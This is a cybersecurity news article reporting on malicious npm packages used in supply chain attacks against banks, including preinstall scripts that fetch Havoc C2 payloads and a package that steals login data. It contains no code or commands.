It’s time for the banking sector to fortify their defenses against supply chain attacks and prioritise security to safeguard against the stealthy threats lurking in the open source landscape.
Cybersecurity researchers have made a concerning discovery in the world of finance – a surge in open source software supply chain attacks specifically targeting the banking sector.
According to a recent report by Checkmarx, these attacks are employing advanced techniques, specifically honing in on certain components in the web assets of targeted banks. By attaching malicious functionalities to these components, the attackers are gaining unauthorised access and wreaking havoc on the financial institutions.
Attackers use fake LinkedIn profile to appear more credible. They add personalised command-and-control (C2) centers for each target. This allows them to exploit legitimate services for their illicit activities, making it harder to detect their malicious actions.
The attackers managed to upload npm packages, a widely-used JavaScript package registry, as the primary vehicle to deliver the malware.
In one incident, the threat actor masqueraded as an employee of the targeted bank and surreptitiously uploaded packages to the npm registry. These packages contained preinstall scripts, which, once activated, set off the infection sequence. To further disguise their intentions, the attacker created a deceptive LinkedIn profile to deceive anyone scrutinising their activity.
Once the script was activated, it assessed the host operating system and proceeded to download a second-stage malware from a remote server. Interestingly, the attackers cleverly used Azure’s CDN subdomains to deliver this payload, skillfully evading traditional deny list methods due to Azure’s legitimate reputation.
The second-stage payload responsible for the intrusion is Havoc, an open source command-and-control (C2) framework that has recently garnered the attention of malicious actors aiming to evade detection by employing more well-known tools like Cobalt Strike, Sliver, and Brute Ratel.
In a separate but related attack in February 2023, another financial institution fell victim to a deceptive package uploaded to npm. This cunning package was designed to blend seamlessly into the bank’s website and remain dormant until activated. Once triggered, it quietly intercepted login data and sent it back to the attackers’ infrastructure, leaving the bank and its customers exposed.
The cybersecurity community is increasingly emphasising the need for supply chain security to protect the entire software creation and distribution process. Once a malicious open source package infiltrates the pipeline, it becomes an instant breach, rendering subsequent countermeasures less effective.
In addition to the open source software supply chain attacks, financial institutions are also grappling with the use of the web-inject toolkit drIBAN, which allows undetectable unauthorised transactions from a victim’s computer, bypassing the identity verification and anti-fraud mechanisms commonly used by the banks.
As the banking sector faces this evolving cyber threat landscape, cybersecurity experts are urging financial institutions to strengthen their defences, closely monitor their supply chains, and remain vigilant against malicious actors seeking to exploit vulnerabilities in the open source software ecosystem.
